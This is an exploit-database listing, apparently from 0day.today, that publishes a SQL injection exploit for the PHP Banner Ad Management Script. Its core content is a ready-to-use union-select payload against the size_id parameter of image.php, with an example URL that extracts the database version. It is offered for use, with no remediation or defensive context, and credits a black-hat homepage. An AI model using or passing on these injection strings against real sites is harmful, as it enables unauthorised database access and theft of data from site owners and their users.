[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Banner Ad Management Script SQL Injection Vulnerability

Author
Egyptian.H4x0rz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15773
Category
web applications
Date add
04-04-2011
Platform
php
####################################################################
[+] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 02-04-2011
[+] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php
[+] category: Web Apps [SQli]
[+] HomePage : Black-hat.cc
####################################################################
Vulnerability:
     
*SQL injection Vulnerability*
    
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
~
[#] eXample
http://www.site.com/ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11
 
 
####################################################################



#  0day.today [2024-11-15]  #